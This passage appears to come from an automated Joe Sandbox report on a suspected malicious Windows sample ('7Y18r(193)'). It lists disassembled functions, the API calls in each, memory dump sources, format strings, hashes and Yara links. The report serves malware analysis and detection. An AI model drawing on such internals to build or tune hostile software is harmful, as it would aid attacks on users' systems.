                                            • Part of subcall function 008A3337: lstrlen.KERNEL32(0089427C,?,?,0089427C,00414716), ref: 008A3342
                                            • Part of subcall function 008A3337: lstrcpy.KERNEL32(00414716,00000000), ref: 008A339C
                                          • strtok_s.MSVCRT ref: 0089BEC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$strtok_s
                                          • String ID:
                                          • API String ID: 1077714376-0
                                          • Opcode ID: 725bc5e25a43332ee6962f2157020678be1d44ab17f88fe9a2f99987aad1004f
                                          • Instruction ID: 61e0ec03de72de80b2b297f82d23cfac629e53ba677ea9f5ac4c48d9f8e98906
                                          • Opcode Fuzzy Hash: 725bc5e25a43332ee6962f2157020678be1d44ab17f88fe9a2f99987aad1004f
                                          • Instruction Fuzzy Hash: 1F717FB29001189BDF55EBB4DC8AEEE7379FB55300F088699F109E3141EE759B848F61
                                          Function 0040E3E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 137stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0040E3F0
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040E3F7
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E529
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E53C
                                          • lstrlen.KERNEL32(?), ref: 0040E549
                                          • lstrlen.KERNEL32(?), ref: 0040E55A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrcatlstrlen$AllocateProcess
                                          • String ID: %s\%s$%s\*
                                          • API String ID: 196298277-2848263008
                                          • Opcode ID: 53a5f5156e2f5994bced82f4df54ca842df4e2015695b9087d017d16251fd8a7
                                          • Instruction ID: 057a8c359136346fbda44e42cf223d9c2834f713af44f8c060b811d7258d1b6b
                                          • Opcode Fuzzy Hash: 53a5f5156e2f5994bced82f4df54ca842df4e2015695b9087d017d16251fd8a7
                                          • Instruction Fuzzy Hash: 985153B1940218AFCB10EBA0DC89EDE7779AB58704F04859AF609A3194DF749BC48F95
                                          Function 0089E387 Relevance: 12.7, APIs: 10, Instructions: 193stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0089E3A5
                                          • memset.MSVCRT ref: 0089E3BC
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089E3F3
                                          • lstrcat.KERNEL32(?,00618268), ref: 0089E412
                                          • lstrcat.KERNEL32(?,?), ref: 0089E426
                                          • lstrcat.KERNEL32(?,00618514), ref: 0089E43A
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 00896637: memcmp.MSVCRT ref: 008966EB
                                            • Part of subcall function 00896317: CloseHandle.KERNEL32(000000FF), ref: 008963F1
                                            • Part of subcall function 00896417: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896446
                                            • Part of subcall function 00896417: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896481
                                            • Part of subcall function 00896767: memcmp.MSVCRT ref: 00896782
                                            • Part of subcall function 00896767: memset.MSVCRT ref: 008967B5
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089E581
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0089E5B0
                                          • lstrcat.KERNEL32(00000000,?), ref: 0089E5C3
                                          • lstrcat.KERNEL32(00000000,004147D0), ref: 0089E5D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$memset$BinaryCryptStringmemcmp$CloseHandlelstrcpy
                                          • String ID:
                                          • API String ID: 2430198047-0
                                          • Opcode ID: 17314aac0f6bf978e8ad9dc97e0f07646332481be90fd5a35d147ebf3c297df5
                                          • Instruction ID: 7ef327045b6d385fb71e0ca0cb8553cc94c9a11f5044c0b5103456cd1c19977c
                                          • Opcode Fuzzy Hash: 17314aac0f6bf978e8ad9dc97e0f07646332481be90fd5a35d147ebf3c297df5
                                          • Instruction Fuzzy Hash: DA713FB2900208ABDF14EBA4DC89FDE7779FF98300F188599F609D7181EA759B44CB61
                                          Function 0040E120 Relevance: 12.7, APIs: 10, Instructions: 193stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040E13E
                                          • memset.MSVCRT ref: 0040E155
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E18C
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E1AB
                                          • lstrcat.KERNEL32(?,?), ref: 0040E1BF
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E1D3
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 004063D0: memcmp.MSVCRT ref: 00406484
                                            • Part of subcall function 004060B0: CloseHandle.KERNEL32(000000FF), ref: 0040618A
                                            • Part of subcall function 004061B0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 004061DF
                                            • Part of subcall function 004061B0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 0040621A
                                            • Part of subcall function 00406500: memcmp.MSVCRT ref: 0040651B
                                            • Part of subcall function 00406500: memset.MSVCRT ref: 0040654E
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E31A
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040E349
                                          • lstrcat.KERNEL32(00000000,?), ref: 0040E35C
                                          • lstrcat.KERNEL32(00000000,004147D0), ref: 0040E36B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$memset$BinaryCryptStringmemcmp$CloseHandlelstrcpy
                                          • String ID:
                                          • API String ID: 2430198047-0
                                          • Opcode ID: a0f8bee08b557520875e11261d1a57ed00df94edf4339c2beed7a363dba5041a
                                          • Instruction ID: 3bc3db500648d3b8e2315029556d61a23618a9b90b51ac58705b3bafe077aa38
                                          • Opcode Fuzzy Hash: a0f8bee08b557520875e11261d1a57ed00df94edf4339c2beed7a363dba5041a
                                          • Instruction Fuzzy Hash: E47176B2900208ABCB14EBA1DC85FDE7779AB48304F04859DF609A7195EB74DB94CF64
                                          Function 00410D30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00000000,00000000,?,00414704,00000000,?,00000000,00000000,?,00000000), ref: 00410D3D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00410D44
                                          • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00410D65
                                          • __aulldiv.LIBCMT ref: 00410D7F
                                          • __aulldiv.LIBCMT ref: 00410D8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatus
                                          • String ID: %d MB$@
                                          • API String ID: 2728336565-3474575989
                                          • Opcode ID: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction ID: 707000b30deade13748eefd01e6ef1cf8622db087f157e1a1a0b944f5097d835
                                          • Opcode Fuzzy Hash: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction Fuzzy Hash: D2113CB0D40208ABDB00DBD4DC45BEEB778AB44704F108509F704AB280DBB8A9408B98
                                          Function 004101B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess$DefaultLangUser
                                          • String ID: *
                                          • API String ID: 1494266314-163128923
                                          • Opcode ID: da7414cfd4f6ef5a06fe243907d838e8ceda39788d4d1a4d1814055982dc2574
                                          • Instruction ID: 6bb6e8a3c801933b98899c13c51f9ac433c06584565f6ba3550c305161e96221
                                          • Opcode Fuzzy Hash: da7414cfd4f6ef5a06fe243907d838e8ceda39788d4d1a4d1814055982dc2574
                                          • Instruction Fuzzy Hash: C5F03A30944208EFD3449FE0A9697DCBBB1EB04702F24A196E609876D0CAB44A909BA1
                                          Function 0040E760 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 172COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%s$%s\%s$%s\*
                                          • API String ID: 0-445461498
                                          • Opcode ID: 9f67832a7bc174ad6bb297f98ca892c05b62021e56163b6fa7a415511eebbadb
                                          • Instruction ID: 653d663be24117141108ce37a0b39abbb6dfde9dc7eb1b584f6f8f355b072eab
                                          • Opcode Fuzzy Hash: 9f67832a7bc174ad6bb297f98ca892c05b62021e56163b6fa7a415511eebbadb
                                          • Instruction Fuzzy Hash: 156164B2900218AFCB10EBA1DC85EEA777DBB48704F04859EF60993191EF749AC4CF95
                                          Function 00403990 Relevance: 11.0, APIs: 2, Strings: 5, Instructions: 479stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00413050: lstrcpy.KERNEL32(?,00000000), ref: 00413096
                                            • Part of subcall function 004038C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00403946
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                            • Part of subcall function 004131D0: lstrcpy.KERNEL32(00000000,?), ref: 00413222
                                            • Part of subcall function 004131D0: lstrcat.KERNEL32(00000000), ref: 00413232
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00414713,00000000,?,?,00000000,?,",00000000,?,00000000), ref: 00403EF8
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00403F14
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat
                                          • String ID: "$"$------$------$------
                                          • API String ID: 2500673778-2180234286
                                          • Opcode ID: 44bb66c9e2f232fd683d127f420070c1dc3cdca0f1b7e3d0de3f29f0438fd1f5
                                          • Instruction ID: 6df12dffe85d056e43b5733e99d7b47ed59c0aa1f6b5f7496db5cac169064cb1
                                          • Opcode Fuzzy Hash: 44bb66c9e2f232fd683d127f420070c1dc3cdca0f1b7e3d0de3f29f0438fd1f5
                                          • Instruction Fuzzy Hash: 9D121972910118AACB14EF91CC92FEEB779AF19305F10419EB10663195EF782F88CF69
                                          Function 0040DD50 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 133COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%s
                                          • API String ID: 0-4073750446
                                          • Opcode ID: bda60e50286d89f94d235c1a7786bef5cc2987b828391edf2943488f008da3cd
                                          • Instruction ID: 1750d670eb3d14c68824cd0173b1008080d249de5a15bbd1f76bd54184e7e69c
                                          • Opcode Fuzzy Hash: bda60e50286d89f94d235c1a7786bef5cc2987b828391edf2943488f008da3cd
                                          • Instruction Fuzzy Hash: DC5135B1900219ABCB14EBA0DC85EEE737DBB54704F04859EB61992094DF799BC8CF94
                                          Function 008A0697 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618168), ref: 008A2428
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,0061850C), ref: 008A2441
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618578), ref: 008A2459
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,006181C8), ref: 008A2471
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,006181B4), ref: 008A248A
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618254), ref: 008A24A2
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618420), ref: 008A24BA
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618298), ref: 008A24D3
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,006184EC), ref: 008A24EB
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618490), ref: 008A2503
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618314), ref: 008A251C
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618248), ref: 008A2534
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618540), ref: 008A254C
                                            • Part of subcall function 008A23E7: GetProcAddress.KERNEL32(006187D8,00618018), ref: 008A2565
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                          • ExitProcess.KERNEL32 ref: 008A06BF
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A0782
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A07A0
                                          • CloseHandle.KERNEL32(?,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A07D2
                                          • ExitProcess.KERNEL32 ref: 008A07DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$EventExitProcess$CloseCreateHandleOpenlstrcpy
                                          • String ID:
                                          • API String ID: 2380255356-0
                                          • Opcode ID: 4aecd75034a670bfe7329fd9e7515af95a6ef275aa1d0a5b97f5ba176cf0156d
                                          • Instruction ID: 85e8c58c5caeeb1f75f5cce5fccca526051c680270cc215868ccd0cd8cc04120
                                          • Opcode Fuzzy Hash: 4aecd75034a670bfe7329fd9e7515af95a6ef275aa1d0a5b97f5ba176cf0156d
                                          • Instruction Fuzzy Hash: 73313A31904209ABEF04FBF8DC56AFD7775FF56300F184419B202E2992DF749A04CA62
                                          Function 008A0F97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,006182BC,00000000,?,00414704,00000000,?,00000000,00000000,?,006180D4), ref: 008A0FA4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 008A0FAB
                                          • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 008A0FCC
                                          • __aulldiv.LIBCMT ref: 008A0FE6
                                          • __aulldiv.LIBCMT ref: 008A0FF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 2728336565-2766056989
                                          • Opcode ID: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction ID: e5c7e154de4c4d1c367a07e435c04d5c6b4328aee9638835bcfc4bd44421b57f
                                          • Opcode Fuzzy Hash: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction Fuzzy Hash: 2A111EB0D40208BBEB00DBE4CC4AFEE7779FB45B05F148549F704AB280D7B999008B95
                                          Function 0089EF67 Relevance: 10.1, APIs: 8, Instructions: 107stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089F007
                                          • lstrcat.KERNEL32(?,00414820), ref: 0089F016
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089F064
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0089F070
                                          • lstrcat.KERNEL32(?,?), ref: 0089F088
                                          • lstrcpy.KERNEL32(?,00414672), ref: 0089F09A
                                          • lstrcat.KERNEL32(?,?), ref: 0089F0C9
                                          • lstrcat.KERNEL32(?,00414828), ref: 0089F0D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$HeapProcess
                                          • String ID:
                                          • API String ID: 947272703-0
                                          • Opcode ID: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction ID: 3c67d465808811b36def0db30a7cca9e5a25134bb5afb5712486eee99f1b60db
                                          • Opcode Fuzzy Hash: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction Fuzzy Hash: 534119B5900218AFDB10DF90DC88FDA77B9FB48304F14D69AE609A7141DF749A85CFA0
                                          Function 0040ED00 Relevance: 10.1, APIs: 8, Instructions: 107stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcat.KERNEL32(0040FE42,00000000), ref: 0040EDA0
                                          • lstrcat.KERNEL32(0040FE42,00414820), ref: 0040EDAF
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0040EDFD
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040EE09
                                          • lstrcat.KERNEL32(0040FE42,?), ref: 0040EE21
                                          • lstrcpy.KERNEL32(?,00414672), ref: 0040EE33
                                          • lstrcat.KERNEL32(0040FE42,?), ref: 0040EE62
                                          • lstrcat.KERNEL32(0040FE42,00414828), ref: 0040EE71
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$HeapProcess
                                          • String ID:
                                          • API String ID: 947272703-0
                                          • Opcode ID: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction ID: 58ace7e0d6db9fe93cd4eb589888f192107353e14a329c3ca55e17269f801fca
                                          • Opcode Fuzzy Hash: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction Fuzzy Hash: 82410DB5900118AFDB10DFA0DC48FDA77B9BB48304F14D59AE609A7180DF749A85CFA4
                                          Function 0089E647 Relevance: 9.1, APIs: 6, Instructions: 137stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0089E657
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0089E65E
                                          • lstrcat.KERNEL32(?,0061846C), ref: 0089E790
                                          • lstrcat.KERNEL32(?,00618190), ref: 0089E7A3
                                          • lstrlen.KERNEL32(?), ref: 0089E7B0
                                          • lstrlen.KERNEL32(?), ref: 0089E7C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrcatlstrlen$AllocateProcess
                                          • String ID:
                                          • API String ID: 196298277-0
                                          • Opcode ID: 614a13f5e494e5adaa664876f4e1c625704d09857c2f29e338efd54800a4e892
                                          • Instruction ID: 875e99a1f109d11b17bdc77efe6a0aea93a610e669bc997602ceab33d09fc2fb
                                          • Opcode Fuzzy Hash: 614a13f5e494e5adaa664876f4e1c625704d09857c2f29e338efd54800a4e892
                                          • Instruction Fuzzy Hash: A4514FB1940218AFCB14EBA4DC89EED7779FB64700F088689B649D3190EF749B84CF91
                                          Function 0089E847 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcat.KERNEL32(?,00618268), ref: 0089E8A2
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089E8C8
                                          • lstrcat.KERNEL32(?,?), ref: 0089E8E7
                                          • lstrcat.KERNEL32(?,?), ref: 0089E8FB
                                          • lstrcat.KERNEL32(?,006181E8), ref: 0089E90E
                                          • lstrcat.KERNEL32(?,?), ref: 0089E922
                                          • lstrcat.KERNEL32(?,00618228), ref: 0089E936
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 0089E647: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0089E657
                                            • Part of subcall function 0089E647: RtlAllocateHeap.NTDLL(00000000), ref: 0089E65E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$AllocateProcesslstrcpy
                                          • String ID:
                                          • API String ID: 710630278-0
                                          • Opcode ID: cd3d44ec05564e5d911b939c83a930d633635ebf2fce865a58714dce4bb94620
                                          • Instruction ID: 3fa2a142a22779c1541035b3a3a4c11ac396f058e87c52ebfbe01217578212d8
                                          • Opcode Fuzzy Hash: cd3d44ec05564e5d911b939c83a930d633635ebf2fce865a58714dce4bb94620
                                          • Instruction Fuzzy Hash: 9C3171B2900218ABDF15FBA4CC89EED7379FB69700F084589B349D6091EE7197C8CB91
                                          Function 0040E5E0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E63B
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E661
                                          • lstrcat.KERNEL32(?,?), ref: 0040E680
                                          • lstrcat.KERNEL32(?,?), ref: 0040E694
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E6A7
                                          • lstrcat.KERNEL32(?,?), ref: 0040E6BB
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E6CF
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 0040E3E0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0040E3F0
                                            • Part of subcall function 0040E3E0: RtlAllocateHeap.NTDLL(00000000), ref: 0040E3F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$AllocateProcesslstrcpy
                                          • String ID:
                                          • API String ID: 710630278-0
                                          • Opcode ID: 05efcce526faeb29057ae03a7f0838e895f82c593997a4498b9513fe27e23abf
                                          • Instruction ID: 62dfa2dff749b3e62b355dedf1c8d3531f46b6e9aa57b72c1fc6bf63700ee715
                                          • Opcode Fuzzy Hash: 05efcce526faeb29057ae03a7f0838e895f82c593997a4498b9513fe27e23abf
                                          • Instruction Fuzzy Hash: 1F3162B2A0020CABCB14FBA0DCC6EDD737DAB58744F44458EB71996095DEB497C8CB98
                                          Function 008A07F7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A08D7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 008A08DE
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpy
                                          • String ID: :$C$\
                                          • API String ID: 3688308991-3809124531
                                          • Opcode ID: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction ID: d24a8953f1cc0361eb973a0d7286e8cba0198d715f7be334ab3d9fe7a84e404a
                                          • Opcode Fuzzy Hash: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction Fuzzy Hash: F93183B0D002489BEF10DBA4CC45FEE7B74FF49304F144099E649A7281DB74AA94CF95
                                          Function 00410590 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410670
